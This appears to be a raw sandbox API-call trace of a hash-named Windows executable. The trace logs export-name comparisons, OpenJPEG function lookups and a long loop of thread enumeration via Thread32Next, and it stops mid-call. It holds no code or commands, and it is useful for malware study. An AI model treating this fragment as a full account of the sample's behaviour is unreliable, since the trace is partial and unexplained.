lpString2="GetEnlistmentRecoveryInformation") returned 1 [0216.492] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0216.492] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0216.492] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0216.492] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0216.492] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0216.492] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0216.492] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0216.493] GetProcessHeap () returned 0x4a0000 [0216.493] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d55030 | out: hHeap=0x4a0000) returned 1 [0216.929] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0216.930] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0216.931] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1000) returned 0x2d55030 [0216.933] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c) returned 0x4b8590 [0216.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_destroy_cstr_info", cchWideChar=-1, lpMultiByteStr=0x4b8590, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_destroy_cstr_info", lpUsedDefaultChar=0x0) returned 22 [0216.933] GetLastError () returned 0x0 [0216.933] SetLastError (dwErrCode=0x0) [0216.933] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_destroy_cstr_infoW") returned 0x0 [0216.933] GetLastError () returned 0x7f [0216.933] SetLastError (dwErrCode=0x7f) [0216.934] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_destroy_cstr_infoA") returned 0x0 [0216.934] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_destroy_cstr_info") returned 0x7ffc45f1a7e0 [0216.934] GetActiveWindow () returned 0x0 [0216.934] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d55030 | out: hHeap=0x4a0000) returned 1 [0216.934] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8590 | out: hHeap=0x4a0000) returned 1 [0216.934] GetCurrentProcessId () returned 0x9b8 [0216.934] GetCurrentThreadId () returned 0xdf0 [0216.934] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0216.947] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.948] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.952] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.952] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.954] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.954] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.955] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0216.956] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.419] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.488] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.488] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.490] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.491] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.491] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.495] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.495] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.871] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.871] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.873] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.874] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.874] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.877] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.877] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0218.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.177] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.519] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.520] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.537] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.538] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.826] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.827] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.828] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.828] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.829] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.830] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.830] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.831] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.832] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.833] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.834] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.835] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.836] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.836] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.837] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.838] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.839] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.173] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.177] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.596] Thread32Next (hSnapshot=0x17c, 